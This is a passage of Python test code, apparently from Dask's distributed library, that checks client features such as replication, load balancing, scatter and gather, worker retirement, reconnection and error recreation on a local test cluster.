assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
yield client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
yield client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
yield wait(future)
assert 0.15 < s.task_duration["slowinc"] < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
yield wait(futures)
assert 0 < s.task_duration["slowinc"] < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
yield wait([x, y])
futures = c.map(inc, range(2, 11))
yield wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
yield wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
yield wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
yield wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = yield c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
yield wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
yield gen.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
yield gen.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
yield gen.sleep(0.01)
yield c.cancel(x)
start = time()
while any(v for w in s.workers.values() for v in w.processing):
assert time() < start + 0.2
yield gen.sleep(0.01)
s.validate_state()
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
@gen_cluster(client=True)
def test_get_processing(c, s, a, b):
processing = yield c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
yield gen.sleep(0.2)
x = yield c.processing()
assert set(x) == {a.address, b.address}
x = yield c.processing(workers=[a.address])
assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
yield wait(futures)
x = yield c.scheduler.ncores()
assert x == s.nthreads
x = yield c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = yield c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = yield c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = yield c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = yield c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = yield c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = yield c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = yield c.scatter(3, workers=[v.address])
yield wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = yield c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = yield c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = yield c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = yield c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
yield u.close()
yield v.close()
d = yield c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = yield c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = yield c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = yield c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True,
Worker=Nanny,
worker_kwargs={"death_timeout": "500ms"},
clean_kwargs={"threads": False, "processes": False},
)
def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with pytest.raises(KilledWorker) as info:
yield f
assert info.value.last_worker.nanny in {a.address, b.address}
yield [a.close(), b.close()]
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with ignoring(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with ignoring(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True)
def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
yield c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
yield gen.moment
assert key not in c.refcount
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
@gen_test()
def test_status():
s = yield Scheduler(port=0)
c = yield Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
yield c.close()
assert c.status == "closed"
yield s.close()
@gen_cluster(client=True)
def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
yield wait(b4)
assert set(map(tokey, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
yield wait(b4)
assert not any(tokey(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(gen.TimeoutError):
yield c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli) as s:
c = Client("127.0.0.1:9393", loop=loop)
start = time()
while len(c.nthreads()) != 1:
sleep(0.1)
assert time() < start + 3
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while c.status != "connecting":
assert time() < start + 5
sleep(0.01)
with pytest.raises(Exception):
c.nthreads()
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result()
with popen(scheduler_cli) as s:
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 5
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 15
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while True:
try:
x.result()
assert False
except CommClosedError:
continue
except CancelledError:
break
assert time() < start + 5
sleep(0.1)
sync(loop, w.close)
c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
def test_reconnect_timeout(c, s):
with captured_logger(logging.getLogger("distributed.client")) as logger:
yield s.close()
start = time()
while c.status != "closed":
yield c._update_scheduler_info()
yield gen.sleep(0.05)
assert time() < start + 5, "Timeout waiting for reconnect to fail"
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.skipif(
sys.version_info[0] == 2, reason="Semaphore.acquire doesn't support timeout option"
)
# @pytest.mark.xfail(reason="TODO: intermittent failures")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
psutil = pytest.importorskip("psutil")
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
@gen.coroutine
def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
yield gen.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
workers.add(w)
yield w
addr = w.worker_address
running[w] = addr
yield gen.sleep(duration)
yield w.close()
del w
yield gen.moment
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == "closed"
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
assert time() < start + 10
@gen_cluster(client=False, timeout=None)
def test_idempotence(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
yield x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
yield y
yield gen.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
yield wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
yield wait(b)
yield gen.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
yield wait([d, e])
assert len(s.transition_log) == len_single_submit
yield c.close()
yield f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
for k, v in v["workers"].items():
assert v is not None
c.get_versions(check=True)
# smoke test for versions
# that this does not raise
v = c.get_versions(packages=["requests"])
assert dict(v["client"]["packages"]["optional"])["requests"] == requests.__version__
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
def test_lose_scattered_data(c, s, a, b):
[x] = yield c.scatter([1], workers=a.address)
yield a.close()
yield gen.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
def test_partially_lose_scattered_data(e, s, a, b, c):
x = yield e.scatter(1, workers=a.address)
yield e.replicate(x, n=2)
yield a.close()
yield gen.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
def test_scatter_compute_lose(c, s, a, b):
[x] = yield c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
yield gen.sleep(0.1)
yield a.close()
with pytest.raises(CancelledError):
yield wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
def test_scatter_compute_store_lose(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
x = yield c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
yield wait(z)
yield a.close()
start = time()
while x.status == "finished":
yield gen.sleep(0.01)
assert time() < start + 2
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
yield wait(zz)
zkey = z.key
del z
start = time()
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
yield gen.sleep(0.01)
assert time() < start + 2
xxkey = xx.key
del xx
start = time()
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
yield gen.sleep(0.01)
assert time() < start + 2
@gen_cluster(client=True)
def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = yield c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
yield gen.sleep(0.1)
yield a.close()
start = time()
while x.status == "finished":
yield gen.sleep(0.01)
assert time() < start + 2
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster(client=False)
def test_serialize_future(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
future = c.submit(lambda: 1)
result = yield future
with temp_default_client(f):
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is f
assert tokey(future2.key) in f.futures
result2 = yield future2
assert result == result2
yield c.close()
yield f.close()
@gen_cluster(client=False)
def test_temp_client(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
with temp_default_client(c):
assert default_client() is c
assert default_client(f) is f
with temp_default_client(f):
assert default_client() is f
assert default_client(c) is c
yield c.close()
yield f.close()
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers={
tuple(L1): a.address,
total: b.address,
tuple(L2): [c.address],
total2: b.address,
},
allow_other_workers=L2 + [total2],
)
yield wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers={tuple(L1): a.address, total: b.address, tuple(L2): [c.address]},
allow_other_workers=L1 + [total],
)
yield wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(client=True)
def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = yield future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
def test_get_restrictions():
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
r1, loose = Client.get_restrictions(L2, "127.0.0.1", False)
assert r1 == {d.key: ["127.0.0.1"] for d in L2}
assert not loose
r1, loose = Client.get_restrictions(L2, ["127.0.0.1"], True)
assert r1 == {d.key: ["127.0.0.1"] for d in L2}
assert set(loose) == {d.key for d in L2}
r1, loose = Client.get_restrictions(L2, {total: "127.0.0.1"}, True)
assert r1 == {total.key: ["127.0.0.1"]}
assert loose == [total.key]
r1, loose = Client.get_restrictions(L2, {(total,): "127.0.0.1"}, True)
assert r1 == {total.key: ["127.0.0.1"]}
assert loose == [total.key]
@gen_cluster(client=True)
def test_scatter_type(c, s, a, b):
[future] = yield c.scatter([1])
assert future.type == int
d = yield c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
def test_retire_workers_2(c, s, a, b):
[x] = yield c.scatter([1], workers=a.address)
yield s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_retire_many_workers(c, s, *workers):
futures = yield c.scatter(list(range(100)))
yield s.retire_workers(workers=[w.address for w in workers[:7]])
results = yield c.gather(futures)
assert results == list(range(100))
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
for w, keys in s.has_what.items():
assert 15 < len(keys) < 50
@gen_cluster(client=True, nthreads=[("127.0.0.1", 3)] * 2)
def test_weight_occupancy_against_data_movement(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
s.task_duration["f"] = 0.01
def f(x, y=0, z=0):
sleep(0.01)
return x
y = yield c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = yield c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
yield wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)])
def test_distribute_tasks_by_nthreads(c, s, a, b):
s.task_duration["f"] = 0.01
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0):
sleep(0.01)
return x
y = yield c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
yield wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
yield wait((u, v, w, x))
x.add_done_callback(f)
t = time()
while len(S) < 4 and time() - t < 2.0:
yield gen.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = yield c.compute(z)
result2 = yield c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2 ** 20, chunks=2 ** 10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@gen_cluster(client=True)
def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
yield wait(yy)
start = time()
future = c.compute(y.sum())
yield future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
yield wait(z)
end = time()
assert end - start < 1
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True, timeout=None)
def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
yield gen.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
yield gen.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True, timeout=None)
def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
yield gen.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
def test_scatter_dict_workers(c, s, a, b):
yield c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.slow
@gen_test()
def test_client_timeout():
c = Client("127.0.0.1:57484", asynchronous=True)
s = Scheduler(loop=c.loop, port=57484)
yield gen.sleep(4)
try:
yield s
except EnvironmentError: # port in use
yield c.close()
return
start = time()
yield c
try:
assert time() < start + 2
finally:
yield c.close()
yield s.close()
@gen_cluster(client=True)
def test_submit_list_kwargs(c, s, a, b):
futures = yield c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = yield future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
def test_map_list_kwargs(c, s, a, b):
futures = yield c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = yield c.gather(futures)
assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
def test_dont_clear_waiting_data(c, s, a, b):
start = time()
x = yield c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
yield gen.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
yield gen.moment
@gen_cluster(client=True)
def test_get_future_error_simple(c, s, a, b):
f = c.submit(div, 1, 0)
yield wait(f)
assert f.status == "error"
function, args, kwargs, deps = yield c._get_futures_error(f)
# args contains only solid values, not keys
assert function.__name__ == "div"
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
def test_get_futures_error(c, s, a, b):
x0 = delayed(dec)(2, dask_key_name="x0")
y0 = delayed(dec)(1, dask_key_name="y0")
x = delayed(div)(1, x0, dask_key_name="x")
y = delayed(div)(1, y0, dask_key_name="y")
tot = delayed(sum)(x, y, dask_key_name="tot")
f = c.compute(tot)
yield wait(f)
assert f.status == "error"
function, args, kwargs, deps = yield c._get_futures_error(f)
assert function.__name__ == "div"
assert args == (1, y0.key)
@gen_cluster(client=True)
def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = yield c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = yield c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
